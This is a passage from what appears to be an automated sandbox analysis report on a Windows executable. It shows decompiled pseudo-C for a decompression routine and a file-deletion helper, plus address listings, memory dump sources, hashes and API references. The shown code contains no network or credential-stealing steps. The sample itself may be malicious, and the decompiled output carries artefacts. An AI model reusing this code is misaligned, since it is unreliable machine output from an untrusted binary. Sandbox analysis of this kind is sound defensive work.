                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  											__al = __al & 0x000000fd;
                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  											goto L120;
                                  										case 0x16:
                                  											__eax =  *(__ebp - 0x30);
                                  											__eflags = __eax - 4;
                                  											if(__eax >= 4) {
                                  												_push(3);
                                  												_pop(__eax);
                                  											}
                                  											__ecx =  *(__ebp - 4);
                                  											 *(__ebp - 0x40) = 6;
                                  											__eax = __eax << 7;
                                  											 *(__ebp - 0x7c) = 0x19;
                                  											 *(__ebp - 0x58) = __eax;
                                  											goto L145;
                                  										case 0x17:
                                  											L145:
                                  											__eax =  *(__ebp - 0x40);
                                  											 *(__ebp - 0x50) = 1;
                                  											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  											goto L149;
                                  										case 0x18:
                                  											L146:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x18;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t484 = __ebp - 0x70;
                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t484;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L148:
                                  											_t487 = __ebp - 0x48;
                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                  											__eflags =  *_t487;
                                  											L149:
                                  											__eflags =  *(__ebp - 0x48);
                                  											if( *(__ebp - 0x48) <= 0) {
                                  												__ecx =  *(__ebp - 0x40);
                                  												__ebx =  *(__ebp - 0x50);
                                  												0 = 1;
                                  												__eax = 1 << __cl;
                                  												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  												__eax =  *(__ebp - 0x7c);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												while(1) {
                                  													 *(_t613 - 0x88) = _t533;
                                  													goto L1;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x50);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  											__eax =  *(__ebp - 0x58);
                                  											__esi = __edx + __eax;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__ax =  *__esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												__cx = __ax >> 5;
                                  												__eax = __eax - __ecx;
                                  												__edx = __edx + 1;
                                  												__eflags = __edx;
                                  												 *__esi = __ax;
                                  												 *(__ebp - 0x50) = __edx;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L148;
                                  											} else {
                                  												goto L146;
                                  											}
                                  										case 0x19:
                                  											__eflags = __ebx - 4;
                                  											if(__ebx < 4) {
                                  												 *(__ebp - 0x2c) = __ebx;
                                  												L119:
                                  												_t393 = __ebp - 0x2c;
                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                  												__eflags =  *_t393;
                                  												L120:
                                  												__eax =  *(__ebp - 0x2c);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  													goto L170;
                                  												}
                                  												__eflags = __eax -  *(__ebp - 0x60);
                                  												if(__eax >  *(__ebp - 0x60)) {
                                  													goto L171;
                                  												}
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  												__eax =  *(__ebp - 0x30);
                                  												_t400 = __ebp - 0x60;
                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  												__eflags =  *_t400;
                                  												goto L123;
                                  											}
                                  											__ecx = __ebx;
                                  											__eax = __ebx;
                                  											__ecx = __ebx >> 1;
                                  											__eax = __ebx & 0x00000001;
                                  											__ecx = (__ebx >> 1) - 1;
                                  											__al = __al | 0x00000002;
                                  											__eax = (__ebx & 0x00000001) << __cl;
                                  											__eflags = __ebx - 0xe;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ebx >= 0xe) {
                                  												__ebx = 0;
                                  												 *(__ebp - 0x48) = __ecx;
                                  												L102:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__eax = __eax + __ebx;
                                  													 *(__ebp - 0x40) = 4;
                                  													 *(__ebp - 0x2c) = __eax;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x644;
                                  													__eflags = __eax;
                                  													L108:
                                  													__ebx = 0;
                                  													 *(__ebp - 0x58) = __eax;
                                  													 *(__ebp - 0x50) = 1;
                                  													 *(__ebp - 0x44) = 0;
                                  													 *(__ebp - 0x48) = 0;
                                  													L112:
                                  													__eax =  *(__ebp - 0x40);
                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  														_t391 = __ebp - 0x2c;
                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  														__eflags =  *_t391;
                                  														goto L119;
                                  													}
                                  													__eax =  *(__ebp - 0x50);
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  													__eax =  *(__ebp - 0x58);
                                  													__esi = __edi + __eax;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__ax =  *__esi;
                                  													__ecx = __ax & 0x0000ffff;
                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                  													if( *(__ebp - 0xc) >= __edx) {
                                  														__ecx = 0;
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  														__ecx = 1;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  														__ebx = 1;
                                  														__ecx =  *(__ebp - 0x48);
                                  														__ebx = 1 << __cl;
                                  														__ecx = 1 << __cl;
                                  														__ebx =  *(__ebp - 0x44);
                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                  														__cx = __ax;
                                  														__cx = __ax >> 5;
                                  														__eax = __eax - __ecx;
                                  														__edi = __edi + 1;
                                  														__eflags = __edi;
                                  														 *(__ebp - 0x44) = __ebx;
                                  														 *__esi = __ax;
                                  														 *(__ebp - 0x50) = __edi;
                                  													} else {
                                  														 *(__ebp - 0x10) = __edx;
                                  														0x800 = 0x800 - __ecx;
                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  														 *__esi = __dx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L111:
                                  														_t368 = __ebp - 0x48;
                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                  														__eflags =  *_t368;
                                  														goto L112;
                                  													} else {
                                  														goto L109;
                                  													}
                                  												}
                                  												__ecx =  *(__ebp - 0xc);
                                  												__ebx = __ebx + __ebx;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  													__ecx =  *(__ebp - 0x10);
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													__ebx = __ebx | 0x00000001;
                                  													__eflags = __ebx;
                                  													 *(__ebp - 0x44) = __ebx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													L101:
                                  													_t338 = __ebp - 0x48;
                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                  													__eflags =  *_t338;
                                  													goto L102;
                                  												} else {
                                  													goto L99;
                                  												}
                                  											}
                                  											__edx =  *(__ebp - 4);
                                  											__eax = __eax - __ebx;
                                  											 *(__ebp - 0x40) = __ecx;
                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  											goto L108;
                                  										case 0x1a:
                                  											L56:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1a;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x68);
                                  											__al =  *(__ebp - 0x5c);
                                  											__edx =  *(__ebp - 8);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  											 *( *(__ebp - 0x68)) = __al;
                                  											__ecx =  *(__ebp - 0x14);
                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                  											__eax = __ecx + 1;
                                  											__edx = 0;
                                  											_t192 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t192;
                                  											goto L79;
                                  										case 0x1b:
                                  											L75:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1b;
                                  												goto L170;
                                  											}
                                  											__eax =  *(__ebp - 0x14);
                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  											__eflags = __eax -  *(__ebp - 0x74);
                                  											if(__eax >=  *(__ebp - 0x74)) {
                                  												__eax = __eax +  *(__ebp - 0x74);
                                  												__eflags = __eax;
                                  											}
                                  											__edx =  *(__ebp - 8);
                                  											__cl =  *(__eax + __edx);
                                  											__eax =  *(__ebp - 0x14);
                                  											 *(__ebp - 0x5c) = __cl;
                                  											 *(__eax + __edx) = __cl;
                                  											__eax = __eax + 1;
                                  											__edx = 0;
                                  											_t274 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t274;
                                  											__eax =  *(__ebp - 0x68);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											_t283 = __ebp - 0x64;
                                  											 *_t283 =  *(__ebp - 0x64) - 1;
                                  											__eflags =  *_t283;
                                  											 *( *(__ebp - 0x68)) = __cl;
                                  											L79:
                                  											 *(__ebp - 0x14) = __edx;
                                  											goto L80;
                                  										case 0x1c:
                                  											while(1) {
                                  												L123:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t414 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t414;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  												__eflags =  *(__ebp - 0x30);
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												 *(__ebp - 0x14) = _t414;
                                  												if( *(__ebp - 0x30) > 0) {
                                  													continue;
                                  												} else {
                                  													L80:
                                  													 *(__ebp - 0x88) = 2;
                                  													goto L1;
                                  												}
                                  											}
                                  											 *(__ebp - 0x88) = 0x1c;
                                  											goto L170;
                                  									}
                                  								}
                                  								L171:
                                  								_t535 = _t534 | 0xffffffff;
                                  								goto L172;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}













                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040726d
                                  0x0040726a

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                  • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                  • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                  • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 41%
                                  			E00405BCB(void* __eflags, WCHAR* _a4, signed int _a8) {
                                  				int _t9;
                                  				long _t13;
                                  				WCHAR* _t14;
                                  
                                  				_t14 = _a4;
                                  				_t13 = E00405FD2(_t14);
                                  				if(_t13 == 0xffffffff) {
                                  					L8:
                                  					return 0;
                                  				}
                                  				_push(_t14);
                                  				if((_a8 & 0x00000001) == 0) {
                                  					_t9 = DeleteFileW();
                                  				} else {
                                  					_t9 = RemoveDirectoryW(); // executed
                                  				}
                                  				if(_t9 == 0) {
                                  					if((_a8 & 0x00000004) == 0) {
                                  						SetFileAttributesW(_t14, _t13);
                                  					}
                                  					goto L8;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}







                                  APIs
                                    • Part of subcall function 00405FD2: GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                    • Part of subcall function 00405FD2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB
                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DAD), ref: 00405BE6
                                  • DeleteFileW.KERNEL32(?,?,?,00000000,00405DAD), ref: 00405BEE
                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
